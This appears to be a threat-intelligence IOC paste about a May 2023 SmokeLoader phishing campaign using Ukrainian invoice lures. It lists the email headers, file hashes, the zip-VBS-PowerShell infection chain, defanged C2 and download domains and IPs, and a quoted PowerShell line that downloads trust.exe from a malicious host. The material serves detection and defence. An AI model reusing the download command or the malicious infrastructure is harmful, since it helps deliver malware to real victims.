VRad

#smokeloader_300523

May 30th, 2023 (edited)
#IOC #OptiData #VR #smokeloader #ZIP #PSWEB #VBS

https://pastebin.com/DgFvarG0

previous_contact:
https://pastebin.com/AayUSaXq
https://pastebin.com/RDVXCe0J
https://pastebin.com/QpG70u8T
https://pastebin.com/BJzcXqkK
https://pastebin.com/kBW7nkZ5
https://pastebin.com/Z7zq0YkW
https://pastebin.com/b8PkhMyN
https://pastebin.com/hkskwKvc
https://pastebin.com/JmthzrL4
https://pastebin.com/1scwT0f8
https://pastebin.com/MP3kCSSh

FAQ:
https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/
https://research.checkpoint.com/2019-resurgence-of-smokeloader/

attack_vector
--------------
email attach .zip? > .VBS > WSH > PowerShell > URL > get download string > %temp%\*.exe


# # # # # # # #
email_headers
# # # # # # # #
Return-Path: <operator.lv01@emm.ua>
Received: from mail.emm.ua (mail.t-sna.com [193.19.240.25])
Received: from internal.domain; Tue, 30 May 2023 08:39:18 +0300
Reply-To: elrayvno@ukr.net
Date: Tue, 30 May 2023 08:39:15 +0300
Subject: Re: акт звірки та рахунки
From: бух. відділ <operator.lv01@emm.ua>
Message-ID: <01bae4p-12pzcf-21@emm.ua>


# # # # # # # #
other senders
# # # # # # # #
operator.lv01[@]emm[.]ua
support[@]romb[.]ua


# # # # # # # #
files
# # # # # # # #
SHA-256 54874acabfbf873ce2c0f8daf7f65f4e545a8e1dc8bb99c312c22a16134a5088
File name Рахунок (без ПДВ) № 28 від 28.05.2023.zip [ Zip archive data ]
File size 65.67 KB (67242 bytes)

SHA-256 6a89bcfa9e6e5f8ab93be9031720f281b5e8923092622163a9d7b7192ad9c5d4
File name Рахунок (без ПДВ) № 28 від 28.05.2023.pdf [ PDF document, version 1.4 ] ! - CLEAN
File size 60.86 KB (62318 bytes)

SHA-256 375798f97452cb9143ffb08922bebb13eb6bb0c27a101ebc568a3e5295361936
File name AKT_28_05_2023p._pax_28_05_2023p.vbs [ JavaScript ]
File size 22.90 KB (23454 bytes)

SHA-256 9892c10b94bbb90688cdc3dd6d51f3343b9cc19069fa4c1fe3594600a3d03330
File name trust.exe [ PE32 executable (GUI) ]
File size 274.00 KB (280576 bytes)


# # # # # # # #
activity
# # # # # # # #

PL_SCR americanocoffea{ .ru > $client.downloadfile('http://americanocoffea{ .ru/antirecord/trust.exe',$path) ! - may change URL and filename
$client.downloadfile('http://jskgdhjkdfhjdkjhd844{ .ru/antirecord/trust.exe',$path)

C2



netwrk
--------------
176.124.193.111 americanocoffea{ .ru 80 HTTP GET / HTTP/1.1
176.124.193.111 americanocoffea{ .ru 80 HTTP GET /antirecord/trust.exe HTTP/1.1

comp
--------------
195.123.219.57 freesitucionap{ .com 80 HTTP POST / HTTP/1.1 (application/x-www-form-urlencoded) Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko

proc
--------------


persist
--------------
n/a


drop
--------------
C:\Users\%username%\AppData\Local\Temp\%random%.exe


# # # # # # # #
additional info
# # # # # # # #
n/a


# # # # # # # #
VT & Intezer
# # # # # # # #
https://www.virustotal.com/gui/file/54874acabfbf873ce2c0f8daf7f65f4e545a8e1dc8bb99c312c22a16134a5088/details
https://www.virustotal.com/gui/file/6a89bcfa9e6e5f8ab93be9031720f281b5e8923092622163a9d7b7192ad9c5d4/details
https://www.virustotal.com/gui/file/375798f97452cb9143ffb08922bebb13eb6bb0c27a101ebc568a3e5295361936/details
https://www.virustotal.com/gui/file/9892c10b94bbb90688cdc3dd6d51f3343b9cc19069fa4c1fe3594600a3d03330/details
https://analyze.intezer.com/analyses/f6d5cfe5-181c-490f-8551-ae9bc12b64c3

VR
